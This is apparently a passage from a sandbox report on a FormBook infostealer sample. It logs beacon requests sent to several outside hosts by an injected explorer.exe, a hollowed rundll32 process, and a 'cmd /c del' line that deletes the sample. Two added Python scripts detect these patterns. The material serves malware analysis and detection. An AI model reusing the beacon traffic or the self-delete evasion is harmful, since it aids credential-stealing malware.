                                                                        Data Ascii: 1ff<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head> <title>Tour Imaging Virtual Tours</title> <meta name="description" content="Tour Imaging Virtual Tours"> <meta name="keywords" content="Tour Imaging Virtual Tours"></head><frameset rows="100%,*" border="0"> <frame src="http://tours.tourimaging.com/s/idx/577033?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&amp;2dND=GVTl-" frameborder="0" /></frameset></html>0


Session ID    Source IP      Source Port    Destination IP     Destination Port    Process
7             192.168.2.3    49744          64.98.145.30       80                  C:\Windows\explorer.exe

Timestamp                               kBytes transferred    Direction    Data
May 12, 2021 12:26:14.073214054 CEST    5570                  OUT          GET /a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- HTTP/1.1
                                                                        Host: www.omfgphil.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
May 12, 2021 12:26:14.218874931 CEST    5572                  IN           HTTP/1.1 303 See Other
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Status: 303 See Other
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-Content-Type-Options: nosniff
                                                                        Location: https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl-
                                                                        Cache-Control: no-cache
                                                                        X-Request-Id: 98627d13-1f0d-4d0f-ac6c-3f13cb1515d0
                                                                        X-Runtime: 0.006362
                                                                        X-Powered-By: Phusion Passenger 4.0.53
                                                                        Date: Wed, 12 May 2021 10:29:49 GMT
                                                                        Server: nginx/1.6.2 + Phusion Passenger 4.0.53
                                                                        P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                        Data Raw: 62 65 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 6d 2e 74 69 6b 74 6f 6b 2e 63 6f 6d 2f 5a 4d 4a 45 33 73 75 65 70 2f 61 38 73 69 3f 4e 5a 62 3d 6a 64 4e 2b 33 52 55 65 6d 73 38 58 67 4a 41 4e 55 77 73 34 57 57 74 6b 62 76 58 78 4d 75 32 68 54 51 2f 74 36 4b 33 66 2b 74 38 70 72 58 69 37 4a 67 57 4b 6b 2b 71 2b 57 48 6c 46 6f 68 46 68 6e 71 74 7a 26 61 6d 70 3b 32 64 4e 44 3d 47 56 54 6c 2d 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: be<html><body>You are being <a href="https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&amp;2dND=GVTl-">redirected</a>.</body></html>


Session ID    Source IP      Source Port    Destination IP     Destination Port    Process
8             192.168.2.3    49746          184.168.131.241    80                  C:\Windows\explorer.exe

Timestamp                               kBytes transferred    Direction    Data
May 12, 2021 12:26:30.319866896 CEST    5588                  OUT          GET /a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl- HTTP/1.1
                                                                        Host: www.boostcoachingonline.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
May 12, 2021 12:26:30.541549921 CEST    5589                  IN           HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx/1.16.1
                                                                        Date: Wed, 12 May 2021 10:26:30 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: http://zoom.us/j/8574583197?pwd=R20vRUg0bGh1THUxUDZZQm9JVlRadz09
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0
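The sessions above all originate from the injected explorer.exe and share one request shape: a short directory path (/a8si/), a long base64-looking NZb value that changes per request, a constant trailing 2dND=GVTl-, a seven-byte null body on a GET, and a different, unrelated Host each time, most of which answer with parked-domain or unrelated redirects. As an added example (not part of this report or of the sandbox), the following Python scores individual requests on that shape and then groups hits by process, path and parameter names, so that one URI skeleton being sent to several unrelated hosts from one process stands out as beaconing rather than browsing. The four FormBook records are taken from the sessions on this page; the two benign records, the regular expressions and the thresholds are assumptions tuned to this report.

```python
import re
from collections import defaultdict

# Constructed from the four HTTP sessions in this report as
# (process, Host header, request line, raw body). The last two records are
# benign requests added for contrast; they are not from the report.
REQUESTS = [
    ("C:\\Windows\\explorer.exe", "www.best-cleaner.com",
     "GET /a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl- HTTP/1.1",
     b"\x00" * 7),
    ("C:\\Windows\\explorer.exe", "www.4520oceanviewavenue.com",
     "GET /a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl- HTTP/1.1",
     b"\x00" * 7),
    ("C:\\Windows\\explorer.exe", "www.omfgphil.com",
     "GET /a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- HTTP/1.1",
     b"\x00" * 7),
    ("C:\\Windows\\explorer.exe", "www.boostcoachingonline.com",
     "GET /a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl- HTTP/1.1",
     b"\x00" * 7),
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "www.example.com",
     "GET /search?q=nginx+1.16.1&page=2 HTTP/1.1", b""),
    ("C:\\Windows\\explorer.exe", "www.example.org",
     "GET /a8si/ HTTP/1.1", b""),
]

# Heuristics assumed from the traffic on this page, not a general FormBook signature.
SHORT_DIR_RE = re.compile(r"^/[a-z0-9]{3,6}/$")          # e.g. /a8si/
B64_BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # long base64-looking value


def parse_target(target):
    """Split a request target into (path, [(key, value), ...]) without
    decoding '+' or '%xx', so base64 blobs are compared exactly as sent."""
    path, _, query = target.partition("?")
    pairs = []
    for item in query.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return path, pairs


def score_request(request_line, body):
    """Return (score, reasons) for one request; score is 0..3."""
    method, target, _ = request_line.split(" ", 2)
    path, params = parse_target(target)
    reasons = []
    if method == "GET" and SHORT_DIR_RE.match(path):
        reasons.append("short random directory path")
    if len(params) == 2 and B64_BLOB_RE.match(params[0][1]) and len(params[1][1]) <= 8:
        reasons.append("long base64 blob followed by a short constant parameter")
    if body and body == b"\x00" * len(body):
        reasons.append("GET carries a body of null bytes")
    return len(reasons), reasons


def find_beacons(requests, min_score=2, min_hosts=3):
    """Flag requests scoring >= min_score, and report every
    (process, path, parameter names) skeleton reused against >= min_hosts
    distinct hosts; one skeleton against many unrelated hosts is the
    beaconing pattern seen in this report."""
    flagged = []
    hosts_by_skeleton = defaultdict(set)
    for process, host, line, body in requests:
        score, reasons = score_request(line, body)
        if score >= min_score:
            flagged.append((host, score, reasons))
            path, params = parse_target(line.split(" ", 2)[1])
            skeleton = (process, path, tuple(key for key, _ in params))
            hosts_by_skeleton[skeleton].add(host)
    campaigns = {skeleton: sorted(hosts)
                 for skeleton, hosts in hosts_by_skeleton.items()
                 if len(hosts) >= min_hosts}
    return flagged, campaigns


if __name__ == "__main__":
    flagged, campaigns = find_beacons(REQUESTS)
    for host, score, reasons in flagged:
        print(host, score, "; ".join(reasons))
    for (process, path, keys), hosts in campaigns.items():
        print("skeleton", path, keys, "from", process, "seen against", hosts)
```

The benign explorer.exe request to /a8si/ with no query and no body scores only 1 and is not flagged, which is the point of scoring on several properties instead of on the path alone; the four real beacons each score 3 and collapse into a single skeleton hitting four hosts.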


                                                                        Behavior

                                                                        System Behavior

                                                                        General

                                                                        Start time:12:24:19
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
                                                                        Imagebase:0x250000
                                                                        File size:973824 bytes
                                                                        MD5 hash:457B22DA77D4DB093A31DD80A4B8963F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:12:24:28
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
                                                                        Imagebase:0xd80000
                                                                        File size:973824 bytes
                                                                        MD5 hash:457B22DA77D4DB093A31DD80A4B8963F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:12:24:31
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:12:24:45
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                        Imagebase:0x1340000
                                                                        File size:61952 bytes
                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:high

                                                                        General

                                                                        Start time:12:24:50
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
                                                                        Imagebase:0x2d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:12:24:50
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
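The process list above shows the loader re-launching its own image, a rundll32.exe started with nothing but its own path on the command line (the sacrificial-process pattern behind the Sigma hit in the signature list), and a cmd.exe whose only job is to delete the original sample. As an added example that is not part of this report, the following Python runs two checks over process-start records constructed from the entries above: an injection host started without arguments, and a del whose target is the image of another observed process. The host-binary list, the extra benign rundll32 record and the absence of parent/child links (the page does not list them and the checks do not need them) are assumptions.

```python
import re

# Constructed from the "System Behavior" entries in this report as
# (start time, image path, command line). The last record is a benign
# rundll32 invocation added for contrast; it is not from the report.
PROCESS_STARTS = [
    ("12:24:19", r"C:\Users\user\Desktop\457b22da_by_Libranalysis.exe",
     r"'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'"),
    ("12:24:28", r"C:\Users\user\Desktop\457b22da_by_Libranalysis.exe",
     r"C:\Users\user\Desktop\457b22da_by_Libranalysis.exe"),
    ("12:24:31", r"C:\Windows\explorer.exe", ""),
    ("12:24:45", r"C:\Windows\SysWOW64\rundll32.exe",
     r"C:\Windows\SysWOW64\rundll32.exe"),
    ("12:24:50", r"C:\Windows\SysWOW64\cmd.exe",
     r"/c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'"),
    ("12:24:50", r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ("12:25:00", r"C:\Windows\System32\rundll32.exe",
     r'C:\Windows\System32\rundll32.exe "C:\Windows\System32\shell32.dll",Control_RunDLL'),
]

# Binaries commonly used as hollowed or injected hosts. Assumed list; extend to taste.
SACRIFICIAL_HOSTS = {"rundll32.exe", "regsvr32.exe", "regasm.exe", "regsvcs.exe"}

# 'del', optional switches such as /f /q, then one optionally quoted path,
# ending at end of line or at a following '&'.
DEL_RE = re.compile(r"\bdel\b(?:\s+/\w+)*\s+(['\"]?)(.+?)\1(?:\s*$|\s*&)", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_argless_sacrificial(image, cmdline):
    """True if a known injection host was started with no arguments at all:
    an empty command line, or one that only repeats the image path."""
    if basename(image) not in SACRIFICIAL_HOSTS:
        return False
    args = cmdline.strip().strip("'\"").lower()
    return args in ("", image.lower(), basename(image))


def deleted_path(cmdline):
    """Return the path a 'cmd /c del ...' command line removes, else None."""
    match = DEL_RE.search(cmdline)
    return match.group(2) if match else None


def analyze(events):
    """Run both checks over (time, image, cmdline) records and return
    findings as (time, image, reason), in event order."""
    observed_images = {image.lower() for _, image, _ in events}
    findings = []
    for time, image, cmdline in events:
        if is_argless_sacrificial(image, cmdline):
            findings.append((time, image, "injection host started without arguments"))
        target = deleted_path(cmdline)
        if target and target.lower() in observed_images:
            findings.append((time, image, "deletes the image of an observed process: " + target))
    return findings


if __name__ == "__main__":
    for time, image, reason in analyze(PROCESS_STARTS):
        print(time, basename(image), reason)
```

Both checks are cheap enough to run on every process-creation event; the self-delete check is only as good as the set of images it is compared against, so in production feed it the image paths seen in the same process tree or host rather than a global list.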
